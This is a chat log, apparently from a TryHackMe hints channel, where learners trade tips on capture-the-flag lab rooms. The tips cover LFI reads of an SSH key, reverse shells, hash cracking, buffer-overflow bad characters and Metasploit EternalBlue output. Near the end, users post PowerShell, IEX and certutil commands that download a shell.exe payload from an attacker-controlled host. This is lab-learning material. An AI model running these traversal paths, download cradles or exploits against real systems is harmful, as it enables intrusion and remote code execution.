I imagine also a few cheatsheets out there in both #resources and the internet

white salmon
#

cough man find

steady stratus
#

hehe and that!

dusk imp
#

I've looked at man find as well @white salmon

#

but my brain implodes everytime for some reason

white salmon
#

If you're really really stuck with it then I find checking out Muirland's writeup helped me, although I try not to if I can help it as I like to work it out on my own.

#

I should mention in the interests of fairness there are other fantastic writeups too.

dusk imp
#

We both know that you're bias towards Muir though 😛

white salmon
#

Ssshh he'll think that I actually like him then his head will swell.

#

is definitely getting banned.

steady stratus
#

It's the last thing we need 😉

dusk imp
#

Haha.

hot umbra
#

Hi, in nmap room, is the hint of the question 3.4 wrong? It says you that the version starts with 6, but with the nmap option for seeing the version of the service the version has some numbers and no one stats with 6

ashen matrix
#

What parameter did you use?

hot umbra
#

-sV -p 22 -v

#

I have accomplished the questions but with a version that is similar to which nmap shows me but not the same, is older

hexed cedar
#

Can someone please assist me with "LFI Walkthrough" Task 2/ question 6. I feel extremely slow right that I'm not understanding the creators question. They're asking which file can give you access to falcon's account on the system. ||[hint=Try to read private key file in '.ssh' folder under falcon's directory.]|| Reading that, I tired to ssh into the machine; no luck. Viewed the page source for better clarity when I entered ||../../etc/passwd|| on the browser, still cant find the|| .ssh folder||. I'm lost right now. HELP PLEASE. ..... Thanks.....

wintry yarrow
#

Its in Falcon's home folder.

hexed cedar
#

@wintry yarrow I'm having issues getting there... You can DM if you'd like.

wintry yarrow
#

If you want ssh key its in ||/home/falcon/.ssh/id_rsa||.

#

Can you read the /etc/passwd file?

hexed cedar
#

Yes, I see the output on the webpage for ../../etc/passwd

#

traversing from there is my issue

wintry yarrow
#

Then try this ||../../home/falcon/.ssh/id_rsa||.

hexed cedar
#

Okay that worked!

wintry yarrow
#

Great. Now, you know what to do next.

hexed cedar
#

I'm attempting right now. I should be able to ssh into the IP with this key, correct?

wintry yarrow
#

Yup.

pine hazel
#

Room: Lazyadmin Task 1 #2 I have a reverse shell and a mysql login info but I'm not sure where I can go from here. Trying to privesc with pwncat but I can't get that figured out either. Don't see any 4000 perms SUID files

wintry yarrow
#

||sudo -l||

pine hazel
#

I saw the .pl but I have no way to edit it

wintry yarrow
#

cat that script and see whats it doing.

dire zinc
wintry yarrow
#

What do you mean by attack .com, org?

dire zinc
#

like. gobuster, nmap so on

wintry yarrow
#

Yeah, but please do attack on room machine and not on actual nginx site.

dire zinc
#

ok ok i see

pine hazel
#

So the file listens on 5554 but on a local network ip

wintry yarrow
#

Check that file's permissions. Maybe you have write access.

pine hazel
#

Well echoing into the file didn't work, cat perm denied me haha

wintry yarrow
#

ls -la file.

pine hazel
#

Let me rephrase, it let me echo but I echod cat /root/root.txt but it doesn't run with privs

wintry yarrow
#

It already have shell code just place your ip and listening port there and get a shell.

#

Also, you have to run .pl file as sudo inorder to execute as root.

dire zinc
#

and make sure you use the same dir as sudo -l told you to use

pine hazel
#

ooooh

#

Man everytime I think I've learned something I just smash my face against seemingly simple problems

wintry yarrow
#

That's life man.

dire zinc
#

Thats what im doing rn...

trim haven
#

It’s hard to tell what you do and don’t know @pine hazel, once you hit a wall everything falls apart :p

pine hazel
#

Lazy admin took me like 2.5 hours sadcooctus

trim haven
#

It took me about the same when I did it :)

dire zinc
#

for 'easypeasy its says to just use gobuster and i have sit here for 20 mins and let it run to find bassicly nothing, could i be doing something wrong?

pine hazel
#

what gobuster command did you use

dire zinc
#

gobuster dir -u 10.10.212.106 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 20

#

found || /hidden ||

#

but cant do much with it

pine hazel
#

Did it scan all the options?

dire zinc
#

wdym

#

like -x?

pine hazel
#

Did your scan complete and only find that one subdirectory?

#

you can also scan those subdirectorys 10.10.212.106/xxxxx

dire zinc
#

its at 43% rn been around 25min

pine hazel
#

I would go to a smaller list

#

like /dirb/common.txt

dire zinc
#

ok ty

pine hazel
#

will be about ~4k options instead of however many that is

dire zinc
#

ye a lot faster

pine hazel
#

when I first gobuster I start with common or big.txt

dire zinc
#

found || /whatever || but still no flag

wintry yarrow
#

||source code||

dire zinc
#

ye got that but no clue how to decode it

wintry yarrow
#

cyberchef.

dire zinc
#

ty

quiet elm
#

any good tool to do web directory enum on "Relevant"? Tried gobuster, but kept getting "Client.Timeout exceeded" even on default thread setting
@quiet elm any help on this?

wintry yarrow
#

dirsearch, dirb, dirbuster.

dire zinc
#

i have used gobuster on || ip, /hidden and on /whatever || and found nothin

wintry yarrow
#

You got ||flag|| right?

dire zinc
#

ye first one

wintry yarrow
#

Enumerate other web servers.

quiet elm
#

dirsearch, dirb, dirbuster.
@wintry yarrow I tried dirb and gobuster. Kept getting timeout, even after I increased timeout setting to 10min, running on only 10 threads

#

got same issue using attack machine too.

#

I seen the video walkthrough, but just wanted to see if I am able to run it on my own

#

without getting the timeouts

wintry yarrow
#

Are you connected through vpn?

quiet elm
#

tried both vpn and attack machine

#

same results it seems

wintry yarrow
#

Show screenshot of what you are doing.

quiet elm
#

u want to see from attack machine or vpn?

wintry yarrow
#

Any will be fine.

#

Just wanted to make sure you are running the right commands. Also, what room are you doing?

quiet elm
#

relevant

wintry yarrow
#

I've heard Windows boxes currently have problems. Wait for thm staff, they will help you.

quiet elm
#

haha, i see

#

the video walkthrough was running 100 threads, and I only ran 10 threads.

#

didnt have issues with other boxes, so you could be right

dire zinc
#

I have tried using burp to replace the useragent on all ports, trying cracking the hash with hashcat and all wordlists i got and tried using gobuster and setting the custom user agent

#

got nothing...

wintry yarrow
#

try harder ||Analyse web server, look for source code.||

dusk imp
#

I'm bashing my head against a wall trying to find the binary to use on day 8 (task 3) of the 25 days of xmas challenges.

#

I've found the binaries that have the suid flag set, i guess I could try them one by one lol

dire zinc
#

@wintry yarrow I got the || user agent md5 hash in the source code but idk what to do with it ||

wintry yarrow
#

Google decode md5 hash.

dire zinc
#

think ive been through 10 websites

#

nothing

wintry yarrow
dusk imp
#

@dire zinc , why not use hashcat or john for a md5 hash?

glossy basin
#

You can use it

#

But try using an online decoder before

#

Just to save time

dusk imp
#

That too.

dire zinc
#

tried hashcat first

#

got nothing

wintry yarrow
dire zinc
#

im on there now, been decrypting for like 5mins

dire zinc
#

why is this not working? || hashcat -O -d 1 -m 1400 '940d71e8655ac41efb5f8ab850668505b86dd64186a66e57d1483e7f5fe6fd81' /usr/share/wordlists/rockyou.txt ||

#

i have been trying to this hash for an hour with the website recomended to me and its still going

ashen matrix
#

Did you look at hashcat examples?

#

Have you looked at the manual for hashcat? Did you try Google?

#

Darkw is giving you the answers, how much research have you conducted in your own?

dire zinc
#

yes

#

a

#

lot

teal belfry
#

I need some hint for OWASP Juice Shop, Task 3 - question3 , I was able to download the required file by bypassing the 403 error but could not find the flag

dire zinc
#

im even using the same website that was in a write up

#

still aint cracking

ashen matrix
#

Well when I use hashcat it isnt like that, but maybe I use it differently then. I went off the hashcat manual examples at the bottom as well as examples I have found online when I was learning that tool

dire zinc
dusk imp
#

Hey Fox.

#

It's an MD5 hash right?

#

nevermind

ashen matrix
#

If you have tried the same thing for over an hour, maybe you are trying to wrong thing. Look up a hash cheat sheet and visually compare them, maybe you're not getting the right results

dusk imp
#

I'm gonna have a gander at this room now.

dire zinc
#

got root, not a fun box

dusk imp
#

eh, it isn't that bad tbh

dire zinc
#

once you get a shell its fine, just getting to that point is so messy

#

like for task 2 flag, im still decrypting it with the website i was suggested. been almost 2 hours

dusk imp
#

that's because the encryption type is not what you think it is when using a hash analyser 🙂

dire zinc
#

so not md4 or md5?

#

ahahahah it just cracked

#

it was md5

#

only took 2 hours but got it

dusk imp
#

the one in the source?

#

940d one?

dire zinc
#

nah the a186 one

dusk imp
#

flag2?

dire zinc
#

yep

dusk imp
#

i can't even recall how i did that one tbh.

heady anchor
#

that box is not that bad

sullen seal
#

Hey all I`m having real issues with OWASP Top 10 Task 27, I have carefully walked through it and still cant get netcat to connect. Initially I had an issue with the version of netcat which I think I have sorted. Feel like I have been through this task 1000 times checking everything as I go

true gazelle
#

hello everyone! im having an issue solving the Burp Suite room , to be more accurate im at Task10[q6] , i have analyzed the set-cookie header ... ive read all the summary page ... there is nothing in there , ive made a huge research online and found a youtube video where there is a russian guy fails at the same point (i dont speak russian i just watched what he did there (Video at 1:02 https://www.youtube.com/watch?v=ONVWzb7l5d8&t=3961s)
can any of you guys give me a better hint?

white salmon
#

I have the same issue like @dire zinc. The password cracking challenges

#

It is true that we use the brute force method with dictionaries what I did but it can't decrypted

final mortar
#

Are you sure you are checking the response, and not the request @true gazelle

true gazelle
#

yeah im at the response tab , i saw the "set-cookie" , then sent it to the sequencer , just like the guy did in the video , after reaching 10,000 i analayzed it and got nothing extraordenery

final mortar
#

Can you show me which one you analyzed

true gazelle
eternal brook
#

Hey I'm doing overflow prep OVERFLOW1 I'm at the finding bad char part I changed my payload according to the python script with my offset set to ||1978|| and retn set to BBBB but wehn I run my exploit.py I can't see ESP register in my log data but my debugger paused am I doing something wrong I'm fairly new to overflow so I might be doing something silly....I'm just following the walkthrough

#

Hey I'm doing overflow prep OVERFLOW1 I'm at the finding bad char part I changed my payload according to the python script with my offset set to ||1978|| and retn set to BBBB but wehn I run my exploit.py I can't see ESP register in my log data but my debugger paused am I doing something wrong I'm fairly new to overflow so I might be doing something silly....I'm just following the walkthrough

Do I need to set the offset back to 0 and retn to none as in the beginning? I tried that too but still couldn't find esp in the log data

true gazelle
#

hello everyone! im having an issue solving the Burp Suite room , to be more accurate im at Task10[q6] , i have analyzed the set-cookie header ... ive read all the summary page ... there is nothing in there , ive made a huge research online and found a youtube video where there is a russian guy fails at the same point (i dont speak russian i just watched what he did there (Video at 1:02 https://www.youtube.com/watch?v=ONVWzb7l5d8&t=3961s)
can any of you guys give me a better hint?
@true gazelle Anyone? please i need hints

uneven nebula
#

guys

#

where is rockyou.txt file located pls tell i forgot

stuck fractal
#

That sounds like a question to google first

uneven nebula
#

oh...i wasn't connected with vpn...

#

wow

stuck fractal
#

That doesn't affect where Rockyou is stored

#

but ok

uneven nebula
#

what the hell

#

im stupid af

#

found it 😄 lmao

mighty plover
#

Hi everyone. Can someone help me with OWASP Juice Shop task 7 - question 2 I have gotten the XSS alert but the flag will not pop. Why?

dense violet
#

@mighty plover check other tabs, windows aren't left open

mighty plover
#

@dense violet I checked but it didn’t work

wise venture
#

Hello, working on room/OWASP-Juice-Shop. Am I missing something here? I think I should be getting a flag when logged in as the admin user and going to the/Administration page, not seeing squat, any thoughts? Task 6, Question 1

#

@true gazelle did you get sorted with your query regarding Burp?

dense violet
#

@dense violet I checked but it didn’t work
@mighty plover i suggest terminate and reload box then, you may have missed it

pine hazel
#

I have gobusterd like 6 different large wordlists on main and sub directory on Lianyu and still can't find a 4 letter dir the room wants me to answer

stuck fractal
#

Use dir 2.3 medium

pine hazel
#

Guess I just need to default to 2.3 medium

warm nest
#

Snowball

oblique cliff
#

Snowball
@warm nest Is there a question or do you just like snowballs?

warm nest
#

Is snowball broken?

stuck fractal
#

Not any more.

#

But it's no longer public

warm nest
#

Oh ok, thats why i cant find it in hacktivities. Thanks!skidy

pine hazel
ashen matrix
#

Then you need a password.

stuck fractal
#

Anonymous perhaps?

pine hazel
#

capital A didnt work

stuck fractal
#

Maybe it's not actually set up for Anonymous and it's lying to you?

pine hazel
#

Didn't know that was possible, but I guess I shouldn't be suprised

pine hazel
#

nmap can scan all ports at once right? I can't seem to find the command to do that anywhere

woven mirage
#

-p-

#

use rustscan

#

its faster

pine hazel
#

holy crap the ftp user was staring me right in the face

white salmon
#

on OWASP top 10 how do i access the directorys for evilshell? i cant recall exactly how to do it and the only things i can find online is how to do it with actually owning the site

#

i’ve attempted exploring it via F12 on firefox and entered all commands

white salmon
#

nvm after coming back i realized i never read anything correctly and the shell was actually the terminal

grand kraken
#

I stuck at Network Services 2, Task 8, question 4;
What is a common application of MySQL?
Anyone can give me a hint about that ?

pine hazel
#

how many characters?

grand kraken
#

8-8

#

there is space between each 8 char.

true gazelle
#

hello everyone! im having an issue solving the Burp Suite room , to be more accurate im at Task10[q6] , i have analyzed the set-cookie header ... ive read all the summary page ... there is nothing in there , ive made a huge research online and found a youtube video where there is a russian guy fails at the same point (i dont speak russian i just watched what he did there (Video at 1:02 https://www.youtube.com/watch?v=ONVWzb7l5d8&t=3961s)
can any of you guys give me a better hint?
@true gazelle Anyone? please i need hints

pine hazel
#

@grand kraken It's under the 'What runs mysql' section in task 8

somber crag
#

XDD

#

I was struggling very hard with that question lul

#

ty @pine hazel

opal cobalt
#

@true gazelle did you work it out? what question are you stuck on?

#

You can try googling for a writeup. there are several available for that machine

strange bloom
#

Hello

#

I wanted to know if you ask for the room owner to reset the room. Would you loose the points you gained after room completion.

final mortar
#

You can try googling for a writeup. there are several available for that machine
@opal cobalt #room-hints are for people who don't want to look at a writeup. #room-help is for people who have looked at writeups and still don't understand something

#

I wanted to know if you ask for the room owner to reset the room. Would you loose the points you gained after room completion.
@strange bloom Yes I guess, cause if you don't you can accumulate unlimited points theoretically

strange bloom
#

Well the room owner would also be involved in scam of helping that particular user gaining points. Each time the owner has to reset it and user has to complete the room again to gain additional points.

final mortar
#

You reset the room, you loose the progress along with the points. Simple

strange bloom
#

that is the simplest and best solution.

final mortar
strange bloom
#

If I had added a room name would it relevant to this room 🙂

#

Thank you for your assistance.

final mortar
#

If I had added a room name would it relevant to this room 🙂
@strange bloom Not really, since you are not stuck and don't really need a hint

strange bloom
#

oh I am in room-hints and not room-help

final mortar
strange bloom
#

I'll need to better understand the rooms before I post. Will do better.

stuck fractal
#

They're channels, not rooms. If you say room, that implies a room on TryHackMe. It's important to be as clear as possible.

strange bloom
#

I meant channels. Apologies

arctic crystal
#
Task 2: Analyze the code```
I didn't understand which code the task is talking about?
#

is it the code from ||github?||

stuck fractal
#

Yes

#

You don't have any other code to analyse.

arctic crystal
#

||backdoor binary?||

stuck fractal
#

That's not code.

#

That's a binary

#

And you don't have that binary

arctic crystal
#

omg then go lang code?

#

I don't know anything about go

stuck fractal
#

It reads like any curly brace language.

#

You don't need to know anything about Go

arctic crystal
#

ya I could answer questions I guess

#

thanks

#

I was going to RE the backdoor

stuck fractal
#

I mean you have the source

#

Literally 0 point

grand kraken
#

I stuck at Network Services 2, Task 8, question 4;
What is a common application of MySQL?
Anyone can give me a hint about that ?
@pine hazel @somber crag I've tried eveything I could but cannot find :/

stuck fractal
#

Read back through the text

#

User your answer format

tardy crater
#

any hints on the last task of the vulnversity room please?

stuck fractal
#

GTFOBins

tardy crater
#

gotcha, thanks

mild eagle
#

Can one ask for a small push in room snowball yet ?

oblique cliff
#

isnt that room private 🤔

mild eagle
#

dunno i have access to the room 🙂

stuck fractal
#

It is private

mild eagle
#

okay private like no hints then 😄 i guess

final mortar
#

You can still DM me I guess 😕 @mild eagle

white salmon
#

the provided hint is pointing to a 7-8 phrase while the answer format is 8-8
@pine hazel @somber crag I've tried eveything I could but cannot find :/
@grand kraken

pine hazel
#

Do you need help with it inbroker?

white salmon
#

@Klokateer yes my adhd has kicked in with this one

pine hazel
#

the first word to the answer contains a -

#

The way to type it in, inside the room is pretty inconsistent.

white salmon
#

@klokateer haha good one thanks

#

btw has the answer for 9.2 worked for you?

#

I am connecting from an eu-west my-machine and I get a 5 letter monitor word , not 7 as in the answer format

#

did multiple redeploys but still I get wrong message

stuck fractal
#

You're getting a... what?

white salmon
#

""Welcome to the ******* monitor."" as in the hint

mossy ermine
#

Hey Guys. How can I face the encryption challenge at the end of task 2 in biohazard room? The one about decrypting all the crests

stuck fractal
#

I am connecting from an eu-west my-machine and I get a 5 letter monitor word , not 7 as in the answer format
@white salmon Try it from a kali

final mortar
#

not at all @sharp patio

sharp patio
#

not at all @sharp patio
@final mortar Ha, sorry, had to delete my post, for some reason your name changed and I thought I tagged the wrong person. lol

white salmon
#

i had problems with that toom, was different on my mysql client
@frozen oasis indeed, since the my-machine didn't have the mysql client pre-installed it has a difference which package from the suggested you install

Command 'mysql' not found, but can be installed with:

apt install mysql-client-core-5.7
apt install mariadb-client-core-10.1

sage linden
#

Owasp juice shop, Last login XSS, the flag is not popping up! though the XSS alert is working fine... Help!

white salmon
#

Hello, for Game ZOne room, i am trying to do privEsc with metasploit, and even though i set the correct username and password, i still get Authentication failed when runining the exploit. Any suggestions?

pine hazel
#

show options and screenshot of the error

white salmon
#

[] Started reverse TCP handler on 10.9.38.xxx:4444
[
] Attempting to login...
[-] Authentication failed
[*] Exploit completed, but no session was created.

trim haven
#

Why do you have .xxx there or is that a place holder?

white salmon
#

place holder

#

so basically the username and pass works when login on the website

trim haven
#

After a quick search around, I believe the exploit is broken on metasploit so you will have to perform it manually :p

white salmon
#

ahh..i was afraid of this :/ shoot. Oh well, i guess doing it manually it is better 😛

#

thanks

trim haven
#

:)

oblique cliff
#

After a quick search around, I believe the exploit is broken on metasploit so you will have to perform it manually :p
@trim haven wait what. Since when

trim haven
#

Check all the write ups, it didn’t work when I did it either I just performed it manually

oblique cliff
#

It worked for me 🤔

trim haven
#

🤷‍♂️

eternal brook
#

https://tryhackme.com/room/cmess priv esc nudge? i'm www-data currently found a cronjob that would probably be used to escalate to root i think but stuck at the getting shell as user andre tried his cms credentials but can switch to him ....

wintry yarrow
#

You have www users shell right?

#

If yes ||then try doing manual enumeration like navigate to other folders, etc||.

eternal brook
#

ok thanks

untold fulcrum
#

hi, with what cipher i can decode the code in frontpage of Theseus ?

wintry yarrow
#

No hints for Theseus.

#

Room owner wants it to be a challenge.

true stirrup
#

I need help in the room "Network Services 2": Task 8 #4 (What is a common application of MySQL?). Can anyone help?

heady anchor
#

@true stirrup google can help

timid hollow
#

I gave up on that one ha ha

true stirrup
#

@heady anchor unfortunately not

heady anchor
white salmon
#

in network services 2 task 8 question 4, i tried all the answers that i could but i got non of them right. imm not sure i even understand the question correctly...can anyone point me in the right direction? thanks.

timid hollow
#

oh aha, I just figured it out because someone gave a hint last night... there are 2 ways to say something, the room has 1 way, the answer is another way (if you search this room for that question, you might find the hint)

#

or if you google what you THINK the answer is, you can find another version of the answer

white salmon
#

wut

#

hol up what

#

ohhhhh

#

now i get it

#

thanks!

fluid field
#

Heys guys, hoping someone could help. room: ZTH: Web 2, Task 11. I've tried both dirbuster and wfuzz to look for a php file using big.txt, but i've only found 3 files, which don't seem to show any sign of command execution. Any hints? I've tried both of these patterns ||ip:82/FUZZ.php ip:82/api.php?cmd=FUZZ ip:82/api.php?FUZZ=ls||

woven mirage
#

@fluid field I have no subscriber anymore so i cant see the task, but if i remember right this is the last task isn't it?

#

If it is, read the task carefully, it doesnt tell you to find a php file

fluid field
#

@woven mirage Yep correct, last question. Even fuzzing for non-php files using the ||big.txt|| that was hinted, I am not having much luck. Any further hints? Appreciate the help!

woven mirage
#

can you send a screenshot of the task description for me to remember what it asks for?

fluid field
woven mirage
#

The task is literally telling you what to do

#

read the flag.txt

fluid field
#

@woven mirage Yep, understand that - the part I am having trouble with is finding the API that will allow me to send commands to be able to read flag.txt. I have tried all sorts of Fuzzing but I have had no luck. That's where I was hoping to get a hint, cheers! (maybe it is staring me in the face, I just don't know what else to try)

woven mirage
#

It is staring you in the face hahaha, well try to think of other ways to read files aside from executing commands in the machine

#

Forget the api for a while

#

imagine how is the filesystem and where could flag.txt be stored in this situation

fluid field
#

@woven mirage hahahaha omg, that was staring me in the face, how did I spend so long on that. Cheers for the help!

desert charm
#

what am i missing

stuck fractal
#

Actual product name, rather than what you said

desert charm
#

|| Rejetto HTTP File Server||

#

found it

muted basin
#

can you help me find nmap scan all ports option guys?

cold valve
#

So, I’m in PS Empire trying to get the listeners to start, but after setting my port to 80, I get “Listener startup on port 80 failed: already in use”. I’m assuming that my Kali machine that I am using through the website is currently using port 80 to provide me the Kali box. Anyway around this to finish the room?
I’ve also ran into this in another room, too. I just forget which one.

trim haven
#

Set your port to a different port?

cold valve
#

@trim haven That would seem obvious, but I’m not sure if I would get the same results since the instructions say to use 80. I’m assuming the target machine is using port 80.

trim haven
#

The port you’re setting is for your own machine I believe

#

If it is already in use on their machine simply restarting it would fix it

#

Because the room tells you how to setup Empire

#

And if it told you to set the port as 80 and 80 did not work, that makes no sense

#

You see my logic? :)

cold valve
#

I see your logic, and thank you. But, I ran into a similar issue with another room. I am using the Tryhackme.com provided browser based Kali machine. While investigating on the similar issue from another room, I found the process that was using port 80 on the Kali machine and I tried killing the process. Once I killed the process, I lost access to the Kali machine. Does that make sense? 😀

#

So, I need port 80 on the Kali running to actually give me access to the machine. Or, that is my thinking.

trim haven
#

I mean

#

You can ssh into the machine

#

But I don’t think you should kill processes

#

Especially as the process you’re killing is the Webserver

#

And the Webserver is your main use

#

You can just change ports it literally doesn’t mean much other than a different port

#

If you really really want port 80 just create your own Vm 🤷‍♂️

cold valve
#

I’ll try a different port and see what happens, thanks!!!

indigo finch
#

hi

cold valve
#

@trim haven thanks for your help. Finished the room!!!

trim haven
#

:p

white salmon
#

in encryption 101 task 5 question 2, i am having trouble with that answer. i tried researching it a lot and rereading the page but couldnt find anything. can anyone point me in the right direction? thanks.

white salmon
#

Thanks! @pine hazel. i got the answer.

#

shoulda read more of the wikipedia

pine hazel
#

No problem.

white salmon
#

Can someone give me a hint on task3 question 7 in de ps empire room

white salmon
#

okay thanks

pearl ridge
#

Can I get any help on Vulnversity -> Compromise the webserver Q3, the aswer is obvious but I'm not getting the expected results in the Burp Suite

stuck fractal
#

What are you expecting?

#

What are you getting?

pearl ridge
#

Also it says Click on "Payloads" and select the "Sniper" attack type, but attack types for me are under the Positions Tab, probably different version

#

What are you expecting?
@stuck fractal With the list from the room, when I run a sniper attack, for each extension I get the Extension not allowed response

#

But one should be able to be uploaded

stuck fractal
#

Ok, enable or disable payload encoding

#

Whatever it's on now, flip it

pearl ridge
#

Thank you, got the success now

#

😄

eternal brook
#

hey i'm not able to get jump point in overflow3 i checked my badchars twice and got unmodified edited the bytearray with them but when i run the jump pt mona command it does not show the jmp pt in log window

#

room-overflow prep overflow3

orchid fossil
#

@eternal brook try different addresses. The last 2 worked for me.

eternal brook
#

it says found 0 address...

orchid fossil
#

If you meant by finding addresses for ||essfunc.dll||. I did it manually via|| !mona find -s "\xff\xe4" -m essfunc.dll||

eternal brook
#

this was my command ||!mona jmp -r esp -cpb "\x00\x11\x12\x40\x41\x5f\x60\xb8\xb9\xee\xef"||

orchid fossil
#

ah. It looks like your badchars are not quite right

eternal brook
#

ok i'll check again then thanks:)

orchid fossil
#

Np. Oddly though, addresses containing \x11 does not work for me. Might be the cause of bad char. So you might wanna try jmp esp gadgets without it to save some of your time!

eternal brook
#

ok so i removed the next char to every hex charthere i found 2 jump address really don't know how...

#

this worked and gave me 2 jmp address if someone could explain me how this happened?||!mona jmp -r esp -cpb "\x00\x11\x40\x5f\xb8\xee"||

orchid fossil
#

Well mona found you the jmp esp addresses without the bad chars u stated

eternal brook
#

Not all of these might be badchars! Sometimes badchars cause the next byte to get corrupted as well, or even effect the rest of the string. {mentioned in the task writeup} is this the reason?

orchid fossil
#

Not quite. That is if you were to be testing for bad characters manually and spot two bad chars, you would want to remove the first bad char as it maybe what is causing the second bad char to appear.

#

So i guess its always recommended to only remove the first bad char you see, and then perform the check again.

eternal brook
#

yea i think that worked the second time when i removed the next bad char i found...

#

thanks for your help:)

orchid fossil
#

Sometimes , if you use scripts to find bad char, there may be error.

#

Doing it manually is better for me

eternal brook
#

ah i've just started learning buffer overflows i'll try doing manually once i get familiar with the process:)

orchid fossil
#

@eternal brook Reading your question again, you are right. The script (possibly mona?) you are using to find bad chars might be removing all bad chars in 1 search iteration instead of the first one. Good luck!

pearl ridge
#

Can someone give a hint on "Blue" room, I'm trying to exploit the maschine with ms17_010_eternalblue but no success

#

[*] 10.10.220.237:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check [+] 10.10.220.237:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit) [*] 10.10.220.237:445 - Scanned 1 of 1 hosts (100% complete) [*] 10.10.220.237:445 - Connecting to target for exploitation. [+] 10.10.220.237:445 - Connection established for exploitation. [+] 10.10.220.237:445 - Target OS selected valid for OS indicated by SMB reply [*] 10.10.220.237:445 - CORE raw buffer dump (42 bytes) [*] 10.10.220.237:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes [*] 10.10.220.237:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv [*] 10.10.220.237:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1 [+] 10.10.220.237:445 - Target arch selected valid for arch indicated by DCE/RPC reply [*] 10.10.220.237:445 - Trying exploit with 12 Groom Allocations. [*] 10.10.220.237:445 - Sending all but last fragment of exploit packet [*] 10.10.220.237:445 - Starting non-paged pool grooming [+] 10.10.220.237:445 - Sending SMBv2 buffers [+] 10.10.220.237:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer. [*] 10.10.220.237:445 - Sending final SMBv2 buffers. [*] 10.10.220.237:445 - Sending last fragment of exploit packet! [*] 10.10.220.237:445 - Receiving response from exploit packet [-] 10.10.220.237:445 - Did not receive a response from exploit packet [*] 10.10.220.237:445 - Sending egg to corrupted connection. [-] 10.10.220.237:445 - Errno::ECONNRESET: Connection reset by peer [*] Exploit completed, but no session was created.

#

Here is the msf output

stuck fractal
#

Metasploit 6 is broken

#

You need metasploit 5

pearl ridge
#

Thank you, I will try that

#

Any reasons why?

stuck fractal
#

Metasploit 6 is unstable

#

Rapid7 asked Kali and Parrot to not ship it

#

Parrot shipped it.

pearl ridge
#

Thanks for the explanation

eternal brook
#

@eternal brook Reading your question again, you are right. The script (possibly mona?) you are using to find bad chars might be removing all bad chars in 1 search iteration instead of the first one. Good luck!
@orchid fossil yes I'm using mona and as far as I understood it .......it does remove all bad chars in one go we just need to rerun that script to confirm that all bad chars are pointed out.....I think it's just that the script (mona) points more bad chars than actual bad chars so we just need to remove one char out of consecutive ones
That's why I think my second command worked
Thanks for your help:)

viscid robin
#

@pearl ridge - try other exploits like exploit/windows/smb/ms17_010_psexec

pearl ridge
#

I tried msf5, exploit is fine, the next step is to convert a shell to meterpreter shell but msf5 fail on that

#

output
[*] Upgrading session ID: 1 [*] Starting exploit/multi/handler [*] Started reverse TCP handler on 10.10.49.173:4433 [-] Post failed: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: The system cannot find the file specified. [-] Call stack: [-] /usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:173:in execute'
[-] /usr/share/metasploit-framework/lib/msf/core/post/common.rb:114:in cmd_exec' [-] /usr/share/metasploit-framework/modules/post/multi/manage/shell_to_meterpreter.rb:164:in run'
[*] Post module execution completed
`

#

I'm now using the Kali linux from tryhackme

pearl ridge
#

@pearl ridge - try other exploits like exploit/windows/smb/ms17_010_psexec
@viscid robin not helping ```[] Started reverse TCP handler on 192.168.1.6:4433
[
] 10.10.220.237:445 - Target OS: Windows 7 Professional 7601 Service Pack 1
[-] 10.10.220.237:445 - Unable to find accessible named pipe!
[*] Exploit completed, but no session was created.

white salmon
#

boilerctf2 The interesting file name in the folder? pls hint

#

so many rabbit holes

#

its hurting my head

stuck fractal
#

You already had a meterpreter I'm guessing? @pearl ridge

pearl ridge
#

@stuck fractal No, I did not

stuck fractal
#

What type of shell did you have before?

dusk imp
#

powershell -c “(New-Object System.Net.WebClient).DownloadFile('http://MYIP:8000/shell.exe', ‘C:\Windows\Temp\shell.exe’)"

Why is this not working for me? I've got a http server running, but it's not doing anything.

Edit: I've also tried: powershell -c “Invoke-WebRequest -Uri ‘http://IP:8000/shell.exe’ -OutFile ‘C:\Windows\Temp\shell.exe'"

mellow swift
#

IEX

night cave
#

Nothing in output?

dusk imp
#

Nup.

#

It's not even grabbing the file.

mellow swift
#

did you try IEX

dusk imp
#

I have not yet, I will try right now, sorry I was answering @night cave

mellow swift
#

iex (new-object net.webclient).downloadstring('http://ip:port/shell.txt')

#

ok

#

or just use certutil

dusk imp
#

that's gonna be a google from me.

mellow swift
#

are you trying to download a file

dusk imp
#

upload.

mellow swift
#

certutil.exe --urlcache -split -f

#

and then your ip address

dusk imp
#

hm, nothing happened.

#

it's for HackPark.

mellow swift
#

I dont know what that is - ive never done a room in my life lol

dusk imp
#

I see.

white salmon
#

Can someone help me with the LFI room
I found the ssh key but the ssh agent says it is the wrong format
what did I do wrong

oblique cliff
#

@dusk imp there are 66368532 ways to download a file. You just gotta keep trying different ones until one works 🙂

dusk imp
#

ohai blob blobheart